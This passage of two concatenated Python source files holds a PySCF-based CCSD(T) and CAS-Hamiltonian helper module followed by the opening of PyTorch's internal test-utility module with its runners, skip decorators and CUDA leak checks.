h1 = np.asarray(f['hcore'][()])
except KeyError:
try:
h1 = np.asarray(f['h1'][()])
except KeyError:
raise KeyError("Could not find 1-electron Hamiltonian")
# ecore sometimes exists, and sometimes as enuc (no frozen electrons)
try:
ecore = float(f['ecore'][()])
except KeyError:
try:
ecore = float(f['enuc'][()])
except KeyError:
ecore = 0.0
# read the number of spin up and spin down electrons if not input
if (num_alpha is None) or (num_beta is None):
try:
num_alpha = int(f['active_nalpha'][()])
except KeyError:
sys.exit("In `load_casfile_to_pyscf()`: \n" + \
" No values found on file for num_alpha " + \
"(key: 'active_nalpha' in h5). " + \
" Try passing in a value for num_alpha, or" + \
" re-check integral file.")
try:
num_beta = int(f['active_nbeta'][()])
except KeyError:
sys.exit("In `load_casfile_to_pyscf()`: \n" + \
" No values found on file for num_beta " + \
"(key: 'active_nbeta' in h5). " + \
" Try passing in a value for num_beta, or" + \
" re-check integral file.")
pyscf_mol, pyscf_mf = cas_to_pyscf(h1, eri, ecore, num_alpha, num_beta)
return pyscf_mol, pyscf_mf
def save_pyscf_to_casfile(fname,
pyscf_mf,
cas_orbitals: Optional[int] = None,
cas_electrons: Optional[int] = None,
avas_orbs=None):
""" Save CAS Hamiltonian from a PySCF mean-field object to an HD5 file
Args:
fname (str): path to hd5 file to be created containing CAS terms
pyscf_mf: PySCF mean field object
cas_orbitals (int, optional): number of orb in CAS space, default all
cas_electrons (int, optional): number of elec in CAS, default all elec
avas_orbs (ndarray, optional): orbitals selected by AVAS in PySCF
"""
h1, eri, ecore, num_alpha, num_beta = \
pyscf_to_cas(pyscf_mf, cas_orbitals, cas_electrons, avas_orbs)
with h5py.File(fname, 'w') as fid:
fid.create_dataset('ecore', data=float(ecore), dtype=float)
fid.create_dataset(
'h0',
data=h1) # note the name change to be consistent with THC paper
fid.create_dataset('eri', data=eri)
fid.create_dataset('active_nalpha', data=int(num_alpha), dtype=int)
fid.create_dataset('active_nbeta', data=int(num_beta), dtype=int)
def factorized_ccsd_t(pyscf_mf, eri_rr = None, use_kernel = True,\
no_triples=False) -> Tuple[float, float, float]:
""" Compute CCSD(T) energy using rank-reduced ERIs
Args:
pyscf_mf - PySCF mean field object
eri_rr (ndarray) - rank-reduced ERIs, or use full ERIs from pyscf_mf
use_kernel (bool) - re-do SCF, using canonical orbitals for one-body?
no_triples (bool) - skip the perturbative triples correction? (CCSD)
Returns:
e_scf (float) - SCF energy
e_cor (float) - Correlation energy from CCSD(T)
e_tot (float) - Total energy; i.e. SCF + Corr energy from CCSD(T)
"""
h1, eri_full, ecore, num_alpha, num_beta = pyscf_to_cas(pyscf_mf)
# If no rank-reduced ERIs, use the full (possibly local) ERIs from pyscf_mf
if eri_rr is None:
eri_rr = eri_full
e_scf, e_cor, e_tot = ccsd_t(h1, eri_rr, ecore, num_alpha, num_beta,\
eri_full, use_kernel, no_triples)
return e_scf, e_cor, e_tot
def ccsd_t(h1, eri, ecore, num_alpha: int, num_beta: int, eri_full = None,\
use_kernel=True, no_triples=False) -> Tuple[float, float, float]:
""" Helper function to do CCSD(T) on set of one- and two-body Hamil elems
Args:
h1 (ndarray) - 2D matrix containing one-body terms (MO basis)
eri (ndarray) - 4D tensor containing two-body terms (MO basis)
may be from integral factorization (e.g. SF/DF/THC)
ecore (float) - frozen core electronic energy + nuclear repulsion energy
num_alpha (int) - number of spin alpha electrons in Hamiltonian
num_beta (int) - number of spin beta electrons in Hamiltonian
eri_full (ndarray) - optional 4D tensor containing full two-body
terms (MO basis) for the SCF procedure only
use_kernel (bool) - re-run SCF prior to doing CCSD(T)?
no_triples (bool) - skip the perturbative triples correction? (CCSD)
Returns:
e_scf (float) - SCF energy
e_cor (float) - Correlation energy from CCSD(T)
e_tot (float) - Total energy; i.e. SCF + Corr energy from CCSD(T)
"""
mol = gto.M()
mol.nelectron = num_alpha + num_beta
n_orb = h1.shape[0]
alpha_diag = [1] * num_alpha + [0] * (n_orb - num_alpha)
beta_diag = [1] * num_beta + [0] * (n_orb - num_beta)
# If eri_full not provided, use (possibly rank-reduced) ERIs for check
if eri_full is None:
eri_full = eri
# either RHF or ROHF ... should be OK since UHF will have two h1s, etc.
if num_alpha == num_beta:
mf = scf.RHF(mol)
scf_energy = ecore + \
2*np.einsum('ii',h1[:num_alpha,:num_alpha]) + \
2*np.einsum('iijj',eri_full[:num_alpha,\
:num_alpha,\
:num_alpha,\
:num_alpha]) - \
np.einsum('ijji',eri_full[:num_alpha,\
:num_alpha,\
:num_alpha,\
:num_alpha])
else:
mf = scf.ROHF(mol)
mf.nelec = (num_alpha, num_beta)
# grab singly and doubly occupied orbitals (assume high-spin open shell)
docc = slice(None, min(num_alpha, num_beta))
socc = slice(min(num_alpha, num_beta), max(num_alpha, num_beta))
scf_energy = ecore + \
2.0*np.einsum('ii',h1[docc, docc]) + \
np.einsum('ii',h1[socc, socc]) + \
2.0*np.einsum('iijj',eri_full[docc, docc, docc, docc]) - \
np.einsum('ijji',eri_full[docc, docc, docc, docc]) + \
np.einsum('iijj',eri_full[socc, socc, docc, docc]) - \
0.5*np.einsum('ijji',eri_full[socc, docc, docc, socc]) + \
np.einsum('iijj',eri_full[docc, docc, socc, socc]) - \
0.5*np.einsum('ijji',eri_full[docc, socc, socc, docc]) + \
0.5*np.einsum('iijj',eri_full[socc, socc, socc, socc]) - \
0.5*np.einsum('ijji',eri_full[socc, socc, socc, socc])
mf.get_hcore = lambda *args: np.asarray(h1)
mf.get_ovlp = lambda *args: np.eye(h1.shape[0])
mf.energy_nuc = lambda *args: ecore
mf._eri = eri_full # ao2mo.restore('8', np.zeros((8, 8, 8, 8)), 8)
mf.init_guess = '1e'
mf.mo_coeff = np.eye(n_orb)
mf.mo_occ = np.array(alpha_diag) + np.array(beta_diag)
w, _ = np.linalg.eigh(mf.get_fock())
mf.mo_energy = w
# Rotate the interaction tensors into the canonical basis.
# Reiher and Li tensors, for example, are read-in in the local MO basis,
# which is not optimal for the CCSD(T) calculation (canonical gives better
# energy estimate whereas QPE is invariant to choice of basis)
if use_kernel:
mf.conv_tol = 1e-7
mf.init_guess = '1e'
mf.verbose = 4
mf.diis_space = 24
mf.level_shift = 0.5
mf.conv_check = False
mf.max_cycle = 800
mf.kernel(mf.make_rdm1(mf.mo_coeff,
mf.mo_occ)) # use MO info to generate guess
mf = stability(mf)
mf = stability(mf)
mf = stability(mf)
# Check if SCF has changed by doing restart, and print warning if so
try:
assert np.isclose(scf_energy, mf.e_tot, rtol=1e-14)
except AssertionError:
print(
"WARNING: E(SCF) from input integrals does not match E(SCF)" + \
" from mf.kernel()")
print(" Will use E(SCF) = {:12.6f} from mf.kernel going forward.".
format(mf.e_tot))
print("E(SCF, ints) = {:12.6f} whereas E(SCF) = {:12.6f}".format(
scf_energy, mf.e_tot))
# New SCF energy and orbitals for CCSD(T)
scf_energy = mf.e_tot
# Now re-set the eri's to the (possibly rank-reduced) ERIs
mf._eri = eri
mf.mol.incore_anyway = True
mycc = cc.CCSD(mf)
mycc.max_cycle = 800
mycc.conv_tol = 1E-8
mycc.conv_tol_normt = 1E-4
mycc.diis_space = 24
mycc.verbose = 4
mycc.kernel()
if no_triples:
et = 0.0
else:
et = mycc.ccsd_t()
e_scf = scf_energy # may be read-in value or 'fresh' SCF value
e_cor = mycc.e_corr + et
e_tot = e_scf + e_cor
print("E(SCF): ", e_scf)
print("E(cor): ", e_cor)
print("Total energy: ", e_tot)
return e_scf, e_cor, e_tot
def open_shell_t1_d1(t1a, t1b, mo_occ, nalpha, nbeta):
"""
T1-diagnostic for open-shell is defined w.r.t Sx eigenfunction of T1
where reference is ROHF.
given i double occ, c unoccupied, x is single occuplied The T1 amps
(high spin) in Sz basis are:
T1 = t_{ia}^{ca}(ca^ ia) + t_{ib}^{cb}(cb^ ib)
+ t_{xa}^{ca}(ca^ xa) + t_{ib}^{xb}(xb^ ib)
T1 in the Sx basis are
T1 = f_{i}^{c}E_{ci} + v_{i}^{c}A_{ci}
+ sqrt(2)f_{x}^{c}(ca^ xa) + sqrt(2)f_{i}^{x}(xb^ ib)
where E_{ci} = ca^ ia + cb^ ib and A_{ci} = ca^ ia - cb^ ib.
See: The Journal of Chemical Physics 98, 9734 (1993);
doi: 10.1063/1.464352
Chemical Physics Letters 372 (2003) 362–367;
doi:10.1016/S0009-2614(03)00435-4
based on these and two papers from Lee the T1-openshell diagnostic is
sqrt(sum_{ia}(f_{ia})^2 + 2sum_{xa}(t_{xa}^{ca})^2
+ 2 sum_{ix}(t_{ib}^{xb})^2) / 2 sqrt{N}
To get this relate eqs 3-7 from Chemical Physics Letters 372 (2003) 362–367
to Eqs. 45, 46, and 51 from Journal of Chemical Physics 98, 9734 (1993);
doi: 10.1063/1.464352.
"""
# compute t1-diagnostic
docc_idx = np.where(np.isclose(mo_occ, 2.))[0]
socc_idx = np.where(np.isclose(mo_occ, 1.))[0]
virt_idx = np.where(np.isclose(mo_occ, 0.))[0]
t1a_docc = t1a[docc_idx, :] # double occ-> virtual
t1b_docc = t1b[docc_idx, :][:, -len(virt_idx):] # double occ-> virtual
if len(socc_idx) > 0:
t1_xa = t1a[socc_idx, :] # single occ -> virtual
t1_ix = t1b[docc_idx, :][:, :len(socc_idx)] # double occ -> single occ
else:
t1_xa = np.array(())
t1_ix = np.array(())
if nalpha - nbeta + len(virt_idx) != t1b.shape[1]:
raise ValueError(
"Inconsistent shapes na {}, nb {}, t1b.shape {},{}".format(
nalpha, nbeta, t1b.shape[0], t1b.shape[1]))
if t1a_docc.shape != (len(docc_idx), len(virt_idx)):
raise ValueError("T1a_ia does not have the right shape")
if t1b_docc.shape != (len(docc_idx), len(virt_idx)):
raise ValueError("T1b_ia does not have the right shape")
if len(socc_idx) > 0:
if t1_ix.shape != (len(docc_idx), len(socc_idx)):
raise ValueError("T1_ix does not have the right shape")
if t1_xa.shape != (len(socc_idx), len(virt_idx)):
raise ValueError("T1_xa does not have the right shape")
t1_diagnostic = np.sqrt(
np.sum((t1a_docc + t1b_docc)**2) + 2 * np.sum(t1_xa**2) +
2 * np.sum(t1_ix**2)) / (2 * np.sqrt(nalpha + nbeta))
# compute D1-diagnostic
f_ia = 0.5 * (t1a_docc + t1b_docc)
s_f_ia_2, _ = np.linalg.eigh(f_ia @ f_ia.T)
s_f_ia_2_norm = np.sqrt(np.max(s_f_ia_2, initial=0))
if len(socc_idx) > 0:
f_xa = np.sqrt(1 / 2) * t1_xa
f_ix = np.sqrt(1 / 2) * t1_ix
s_f_xa_2, _ = np.linalg.eigh(f_xa @ f_xa.T)
s_f_ix_2, _ = np.linalg.eigh(f_ix @ f_ix.T)
else:
s_f_xa_2 = np.array(())
s_f_ix_2 = np.array(())
s_f_xa_2_norm = np.sqrt(np.max(s_f_xa_2, initial=0))
s_f_ix_2_norm = np.sqrt(np.max(s_f_ix_2, initial=0))
d1_diagnostic = np.max(
np.array([s_f_ia_2_norm, s_f_xa_2_norm, s_f_ix_2_norm]))
return t1_diagnostic, d1_diagnostic
|
r"""Importing this file must **not** initialize CUDA context. test_distributed
relies on this assumption to properly run. This means that when this is imported
no CUDA calls shall be made, including torch.cuda.device_count(), etc.
torch.testing._internal.common_cuda.py can freely initialize CUDA context when imported.
"""
import sys
import os
import platform
import re
import gc
import types
from functools import partial
import inspect
import io
import argparse
import unittest
import warnings
import random
import contextlib
import socket
import subprocess
import time
from collections import OrderedDict
from contextlib import contextmanager
from functools import wraps
from itertools import product
from copy import deepcopy
from numbers import Number
import tempfile
import json
from urllib.request import urlopen
import __main__
import errno
from typing import cast, Any, Iterable, Optional
from torch.testing._internal import expecttest
from torch.testing import _compare_tensors_internal, _compare_scalars_internal, _compare_return_type
import torch
import torch.cuda
from torch._utils_internal import get_writable_path
from torch._six import string_classes
import torch.backends.cudnn
import torch.backends.mkl
from enum import Enum
from torch.autograd import gradcheck
from torch.autograd.gradcheck import gradgradcheck
torch.backends.disable_global_flags()
IS_SANDCASTLE = os.getenv('SANDCASTLE') == '1' or os.getenv('TW_JOB_USER') == 'sandcastle'
class ProfilingMode(Enum):
LEGACY = 1
SIMPLE = 2
PROFILING = 3
def cppProfilingFlagsToProfilingMode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
if old_prof_exec_state:
if old_prof_mode_state:
return ProfilingMode.PROFILING
else:
return ProfilingMode.SIMPLE
else:
return ProfilingMode.LEGACY
@contextmanager
def enable_profiling_mode_for_profiling_tests():
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def enable_profiling_mode():
old_prof_exec_state = torch._C._jit_set_profiling_executor(True)
old_prof_mode_state = torch._C._jit_set_profiling_mode(True)
try:
yield
finally:
torch._C._jit_set_profiling_executor(old_prof_exec_state)
torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
try:
yield
finally:
torch._C._jit_set_num_profiled_runs(old_num_runs)
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
if 'profile_and_replay' in kwargs:
del kwargs['profile_and_replay']
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
with enable_profiling_mode_for_profiling_tests():
callable(*args, **kwargs)
return callable(*args, **kwargs)
return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
return prof_callable(meth_call, *args, **kwargs)
torch._C.ScriptFunction.__call__ = prof_func_call
torch._C.ScriptMethod.__call__ = prof_meth_call
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('--subprocess', action='store_true',
help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--ge_config', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
const=_get_test_report_path(),
default=_get_test_report_path() if bool(os.environ.get('IN_CIRCLECI')) else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
args, remaining = parser.parse_known_args()
if args.ge_config == 'legacy':
GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.ge_config == 'profiling':
GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.ge_config == 'simple':
GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
# infer flags based on the default settings
GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
def wait_for_process(p):
try:
return p.wait()
except KeyboardInterrupt:
# Give `p` a chance to handle KeyboardInterrupt. Without this,
# `pytest` can't print errors it collected so far upon KeyboardInterrupt.
exit_status = p.wait(timeout=5)
if exit_status is not None:
return exit_status
else:
p.kill()
raise
except: # noqa E722, copied from python core library
p.kill()
raise
finally:
# Always call p.wait() to ensure exit
p.wait()
def shell(command, cwd=None, env=None):
sys.stdout.flush()
sys.stderr.flush()
# The following cool snippet is copied from Py3 core library subprocess.call
# only the with
# 1. `except KeyboardInterrupt` block added for SIGINT handling.
# 2. In Py2, subprocess.Popen doesn't return a context manager, so we do
# `p.wait()` in a `final` block for the code to be portable.
#
# https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
return wait_for_process(p)
# Used to run the same test with different tensor types
def repeat_test_for_types(dtypes):
def repeat_helper(f):
@wraps(f)
def call_helper(self, *args):
for dtype in dtypes:
with TestCase.subTest(self, dtype=dtype):
f(self, *args, dtype=dtype)
return call_helper
return repeat_helper
# Environment variable `IS_PYTORCH_CI` is set in `.jenkins/common.sh`.
IS_PYTORCH_CI = bool(os.environ.get('IS_PYTORCH_CI'))
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
return ['.'.join(case.id().split('.')[-2:]) for case in test_cases]
def chunk_list(lst, nchunks):
return [lst[i::nchunks] for i in range(nchunks)]
def run_tests(argv=UNITTEST_ARGS):
if TEST_DISCOVER:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
for name in get_test_names(test_cases):
print(name)
elif TEST_IN_SUBPROCESS:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
failed_tests = []
for case in test_cases:
test_case_full_name = case.id().split('.', 1)[1]
exitcode = shell([sys.executable] + argv + [test_case_full_name])
if exitcode != 0:
failed_tests.append(test_case_full_name)
assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
len(failed_tests), '\n\t'.join(failed_tests))
elif RUN_PARALLEL > 1:
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
processes = []
for i in range(RUN_PARALLEL):
command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
processes.append(subprocess.Popen(command, universal_newlines=True))
failed = False
for p in processes:
failed |= wait_for_process(p) != 0
assert not failed, "Some test shards have failed"
elif TEST_SAVE_XML is not None:
# import here so that non-CI doesn't need xmlrunner installed
import xmlrunner
test_report_path = TEST_SAVE_XML + LOG_SUFFIX
os.makedirs(test_report_path, exist_ok=True)
verbose = '--verbose' in argv or '-v' in argv
if verbose:
print('Test results will be stored in {}'.format(test_report_path))
unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
elif REPEAT_COUNT > 1:
for _ in range(REPEAT_COUNT):
if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
sys.exit(-1)
else:
unittest.main(argv=argv)
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
if IS_WINDOWS:
@contextmanager
def TemporaryFileName():
# Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
# opens the file, and it cannot be opened multiple times in Windows. To support Windows,
# close the file after creation and try to remove it manually
f = tempfile.NamedTemporaryFile(delete=False)
try:
f.close()
yield f.name
finally:
os.unlink(f.name)
else:
@contextmanager # noqa: T484
def TemporaryFileName():
with tempfile.NamedTemporaryFile() as f:
yield f.name
def _check_module_exists(name):
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
import importlib
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
# Disables non-slow tests (these tests enabled by default)
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests. (I could have done an enum, but
# it felt a little awkward.
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
if TEST_NUMPY:
import numpy as np
# Dict of NumPy dtype -> torch dtype (when the correspondence exists)
numpy_to_torch_dtype_dict = {
np.bool : torch.bool,
np.uint8 : torch.uint8,
np.int8 : torch.int8,
np.int16 : torch.int16,
np.int32 : torch.int32,
np.int64 : torch.int64,
np.float16 : torch.float16,
np.float32 : torch.float32,
np.float64 : torch.float64,
np.complex64 : torch.complex64,
np.complex128 : torch.complex128
}
# Dict of torch dtype -> NumPy dtype
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
ALL_TENSORTYPES = [torch.float,
torch.double,
torch.half]
# bfloat16 bringup is currently only available on ROCm
# ALL_TENSORTYPES2 will eventually be unified with ALL_TENSORTYPES
# when bfloat16 bringup is complete on all platforms
if TEST_WITH_ROCM:
ALL_TENSORTYPES2 = [torch.float,
torch.double,
torch.half,
torch.bfloat16]
else:
ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_ROCM:
raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
else:
fn(*args, **kwargs)
return wrapper
def skipIfCompiledWithoutNumpy(fn):
# Even if the numpy module is present, if `USE_NUMPY=0` is used during the
# build, numpy tests will fail
numpy_support = TEST_NUMPY
if numpy_support:
try:
# The numpy module is present, verify that PyTorch is compiled with
# numpy support
torch.from_numpy(np.array([2, 2]))
except RuntimeError:
numpy_support = False
@wraps(fn)
def wrapper(*args, **kwargs):
if not numpy_support:
raise unittest.SkipTest("PyTorch was compiled without numpy support")
else:
fn(*args, **kwargs)
return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch._C.has_lapack:
raise unittest.SkipTest('PyTorch compiled without Lapack')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNotRegistered(op_name, message):
"""Wraps the decorator to hide the import of the `core`.
Args:
op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
message: message to fail with.
Usage:
@skipIfNotRegistered('MyOp', 'MyOp is not linked!')
This will check if 'MyOp' is in the caffe2.python.core
"""
try:
from caffe2.python import core
skipper = unittest.skipIf(op_name not in core._REGISTERED_OPERATORS,
message)
except ImportError:
skipper = unittest.skip("Cannot import `caffe2.python.core`")
return skipper
def skipIfNoSciPy(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_SCIPY:
raise unittest.SkipTest("test require SciPy, but SciPy not found")
else:
fn(*args, **kwargs)
return wrapper
def slowTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
else:
fn(*args, **kwargs)
wrapper.__dict__['slow_test'] = True
return wrapper
def skipCUDAMemoryLeakCheckIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_memory_leak_check', True): # if current True
fn._do_cuda_memory_leak_check = not condition
return fn
return dec
def skipCUDANonDefaultStreamIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_non_default_stream', True): # if current True
fn._do_cuda_non_default_stream = not condition
return fn
return dec
def suppress_warnings(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fn(*args, **kwargs)
return wrapper
def get_cpu_type(type_name):
module, name = type_name.rsplit('.', 1)
assert module == 'torch.cuda'
return getattr(torch, name)
def get_gpu_type(type_name):
if isinstance(type_name, type):
type_name = '{}.{}'.format(type_name.__module__, type_name.__name__)
module, name = type_name.rsplit('.', 1)
assert module == 'torch'
return getattr(torch.cuda, name)
def to_gpu(obj, type_map=None):
if type_map is None:
type_map = {}
if isinstance(obj, torch.Tensor):
assert obj.is_leaf
t = type_map.get(obj.type(), get_gpu_type(obj.type()))
with torch.no_grad():
res = obj.clone().type(t)
res.requires_grad = obj.requires_grad
return res
elif torch.is_storage(obj):
return obj.new().resize_(obj.size()).copy_(obj)
elif isinstance(obj, list):
return [to_gpu(o, type_map) for o in obj]
elif isinstance(obj, tuple):
return tuple(to_gpu(o, type_map) for o in obj)
else:
return deepcopy(obj)
def get_function_arglist(func):
return inspect.getfullargspec(func).args
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
if TEST_NUMPY:
np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
rng_state = torch.get_rng_state()
if torch.cuda.is_available():
cuda_rng_state = torch.cuda.get_rng_state()
yield
if torch.cuda.is_available():
torch.cuda.set_rng_state(cuda_rng_state)
torch.set_rng_state(rng_state)
@contextlib.contextmanager
def set_default_dtype(dtype):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(dtype)
yield
torch.set_default_dtype(saved_dtype)
def iter_indices(tensor):
if tensor.dim() == 0:
return range(0)
if tensor.dim() == 1:
return range(tensor.size(0))
return product(*(range(s) for s in tensor.size()))
def is_iterable(obj):
try:
iter(obj)
return True
except TypeError:
return False
class CudaNonDefaultStream():
def __enter__(self):
# Before starting CUDA test save currently active streams on all
# CUDA devices and set new non default streams to all CUDA devices
# to ensure CUDA tests do not use default stream by mistake.
beforeDevice = torch.cuda.current_device()
self.beforeStreams = []
for d in range(torch.cuda.device_count()):
self.beforeStreams.append(torch.cuda.current_stream(d))
deviceStream = torch.cuda.Stream(device=d)
torch._C._cuda_setStream(deviceStream._cdata)
torch._C._cuda_setDevice(beforeDevice)
def __exit__(self, exec_type, exec_value, traceback):
# After completing CUDA test load previously active streams on all
# CUDA devices.
beforeDevice = torch.cuda.current_device()
for d in range(torch.cuda.device_count()):
torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
def __init__(self, testcase, name=None):
self.name = testcase.id() if name is None else name
self.testcase = testcase
# initialize context & RNG to prevent false positive detections
# when the test is the first to initialize those
from torch.testing._internal.common_cuda import initialize_cuda_context_rng
initialize_cuda_context_rng()
@staticmethod
def get_cuda_memory_usage():
# we don't need CUDA synchronize because the statistics are not tracked at
# actual freeing, but at when marking the block as free.
num_devices = torch.cuda.device_count()
gc.collect()
return tuple(torch.cuda.memory_allocated(i) for i in range(num_devices))
def __enter__(self):
self.befores = self.get_cuda_memory_usage()
def __exit__(self, exec_type, exec_value, traceback):
# Don't check for leaks if an exception was thrown
if exec_type is not None:
return
afters = self.get_cuda_memory_usage()
for i, (before, after) in enumerate(zip(self.befores, afters)):
self.testcase.assertEqual(
before, after, msg='{} leaked {} bytes CUDA memory on device {}'.format(
self.name, after - before, i))
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=100,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=10,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"debug",
settings(
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=1000,
verbosity=hypothesis.Verbosity.verbose))
hypothesis.settings.load_profile(
"pytorch_ci" if IS_PYTORCH_CI else os.getenv('PYTORCH_HYPOTHESIS_PROFILE',
'dev')
)
except ImportError:
print('Fail to import hypothesis in common_utils, tests are not derandomized')
disabled_test_from_issues = None
def check_disabled(test_name):
global disabled_test_from_issues
if disabled_test_from_issues is None:
disabled_test_from_issues = {}
def read_and_process():
url = 'https://raw.githubusercontent.com/zdevito/pytorch_disabled_tests/master/result.json'
contents = urlopen(url, timeout=1).read().decode('utf-8')
the_response = json.loads(contents)
for item in the_response['items']:
title = item['title']
key = 'DISABLED '
if title.startswith(key):
test_name = title[len(key):].strip()
disabled_test_from_issues[test_name] = item['html_url']
if not IS_SANDCASTLE and os.getenv("PYTORCH_RUN_DISABLED_TESTS", "0") != "1":
try:
read_and_process()
except Exception:
print("Couldn't download test skip set, leaving all tests enabled...")
if test_name in disabled_test_from_issues:
raise unittest.SkipTest(
"Test is disabled because an issue exists disabling it: {}".format(disabled_test_from_issues[test_name]) +
